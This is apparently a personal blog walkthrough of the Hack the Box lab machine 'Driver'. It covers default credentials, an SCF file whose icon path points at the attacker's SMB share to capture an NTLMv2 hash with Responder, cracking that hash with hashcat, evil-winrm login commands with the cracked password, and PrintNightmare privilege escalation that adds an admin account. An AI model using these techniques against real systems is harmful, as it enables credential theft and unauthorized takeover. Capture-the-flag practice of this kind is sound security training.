top of page
  • BlueDolphin

Hack the Box - Driver

Updated: Apr 20, 2022

Engagement flow

Summary

This was an easy rated machine that started off light with some default login credentials for our initial foothold into the MFP printer center. From here we identified a possible SCF file injection vulnerability and later tested and confirmed which provided the ability to utilize responder and force an NTLMV2 authentication attempt by the server with out rogue responder over SMB. From here we cracked the hash and utilized evil-winrm to login to the target as user Tony. From here we pivoted and enumerated internally learning about a Ricoh PLC6 driver which has a printer nightmare vulnerability. We faced some obstacles in trying to execute the various printer nightmare scripts due to the execution policy prevention policies. We were able to bypass this by using the scripting function within Evil-WinRM to import the printer nightmare and invoke functions from within in order to obtain root.

Tools used
  • Responder (SMB server)

  • Hashcat

  • Evil WinRM

  • WinPeas

Processes/Techniques
  • SCF injection

  • Hash capturing NTLMv2

  • Rogue server (MITM) use

  • Internal enumeration

  • Printer nightmare vulnerability

References
Enumeration

A basic nmap scan reveals 3 ports open. We are missing the usual suspect, port 22 for our SSH connections. We do however have the regular port 80 and two ports suggestive that SMB is in use, port 135/445.


We perform a more in-depth scan with the -sC and -sV flags. We learn our target is running Windows IIS http 10.0. We can also see that SMB has guest and user authentication enforced and protected closing the door for authenticated attacks at this stage.


Web enumeration

Browsing over to the web page provides a prompt requesting that we authenticate in order to proceed. The prompt provides the details revealing our target is some type of printer related portal. Entering default credentials of admin:admin grants access. (that does not happen often. Usually you have to find default credentials from the device manual under setup instructions)



MFP Firmware Update Center

Our landing page is quite basic and straight forwards. The only link that worked from the above ribbon is the Firmware Updates center.

Initial foothold

In this stage we performed a fair amount of research and testing with many questions posted on the Hack the Box forum. This lead to the understanding and exploration of a new type of attack known as SCF file injection. SCF stands for shell command file. This is a way to pass shell commands over the SMB protocol for execution on a target host. Some research provided the two links below with offer a very nice explanation.


Configure an .scf file

[Shell]
Command=2
IconFile=\\10.10.14.24\share\test.scf
[Taskbar]
Command=ToggleDesktop

Fire up responder and confirm responder is running an SMB server.


From here we upload our scf file over the MFP Firmware Update Center and click submit. From here we should see activity on our responder server.



We can see that we successfully conducted a man in the middle attack. Responder was able to spoof our target and capture the SCF file transmission and authentication hash required to transfer this file.


Crack the hash

We take this hash and run it through hashcat. First we have to map the NTLMv2 hash in hashcat. This is id 5600 and we combine this with the common wordlist rockyou.txt. We finally arrive at the password liltony.

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 

tony::DRIVER:318176a96a4b3650:695C6727BCA1FCED2457FAB5A990D343:0101000000000000001475FB8430D8018B78B6606899D06E0000000002000800340035003200430001001E00570049004E002D00390042003800550051004800300033005A004900390004003400570049004E002D00390042003800550051004800300033005A00490039002E0034003500320043002E004C004F00430041004C000300140034003500320043002E004C004F00430041004C000500140034003500320043002E004C004F00430041004C0007000800001475FB8430D80106000400020000000800300030000000000000000000000000200000A88F15A0CDD2E31A163DF538EFC1B299CE43C13228698CE67780D4B48BFEA9820A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003400000000000000000000000000



Initial connection

Having a valid set of credentials we proceeded to connect to the target host. However SSH over port 22 is not present. Luckily we can connect over the SMB protocol by utilizing evil-winrm.


We upload and run winpeas to help perform some initial enurmation.

Evidence 1

The Powershell history of user tony may reveal valuable information.

 Directory of C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine                                                        
                                                                                                                                           
09/28/2021  11:06 AM               134 ConsoleHost_history.txt     

We take a look and simply learn that a Ricoh PCL6 was added with a PCL6 universal driver.


Evidence 2

We see that the Firewall status is set to standard profile and enabled.

Firewall status:                                                                                                                           
-------------------------------------------------------------------                                                                        
Profile                           = Standard                                                                                               
Operational mode                  = Enable                                                                                                 
Exception mode                    = Enable                                                                                                 
Multicast/broadcast response mode = Enable                                                                                                 
Notification mode                 = Enable                                                                                                 
Group policy version              = Windows Firewall                                                                                       
Remote admin mode                 = Disable         



Evidence 3

Reviewing internal protocol we notice port 5985 for winrm is in use. This is likely from our evil-winrm tool.

Port configuration for Domain profile:                                                                                                     
Port   Protocol  Mode    Traffic direction     Name                                                                                        
-------------------------------------------------------------------                                                                        
5985   TCP       Enable  Inbound               winrm                                                                                       
                                                                                                                                           
ICMP configuration for Domain profile:                                                                                                     
Mode     Type  Description                                    



Evidence 4

We review hidden folders which winpeas identified for us. We again noticed this Ricoh_drv which was used for the Ricoh printer. Performing some research into the Ricoh printer reveals vulnerabilities based on various versions. This includes the printer nightmare vulnerability.

Searching hidden files or folders in C:\Users home (can be slow)
                                                                                                                                               
     C:\Users\All Users\ntuser.pol
     C:\Users\All Users\RICOH_DRV
     C:\Users\Default User
     C:\Users\Default
     C:\Users\All Users
     C:\Users\tony\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2                                                                                                          
     C:\Users\tony\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1                                                                                                          
     C:\Users\tony\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2                                                                                                 
     C:\Users\tony\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1                                                                                                 
     C:\Users\tony\ntuser.pol
     C:\Users\All Users\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\do_not_delete_folders

Ricoh PCL6 Vulnerability

Reading the article below provides some insight into the ricoh printer driver attack that allows for privilege escalation.





I had some trouble getting the exploit to work and learned how to leverage winrm to import module's. Execution policy was restricted so I could not import the functions of printer nightmare directly from powershell.


In order to import modules into windows by packing them into Evilwin, I had to specify a script area in the initial winrm connection.


└─$ evil-winrm -i 10.129.95.238 -u tony -p liltony -s /home/kali/HTB/driver/                                                           

Root

Looking at the evil winrm menu we have an option to utilize a dll-loader and binary invoker which may work as well, but I have not tested.


I simple called our script by typing exploit.ps1 at the winrm cmd line. Here we can see the addition of the printer nightmare functions. It is listed under get_nightmare_dll.


From here we called the Invoke-Nightmare function and it successfully executes, creating a local administrator account named 'adm1n' and 'P@ssw0rd'


From here we utilize evil-winrm to connect with our new credentials captured from the printer nightmare exploit.


168 views0 comments

Recent Posts

See All

Comments


bottom of page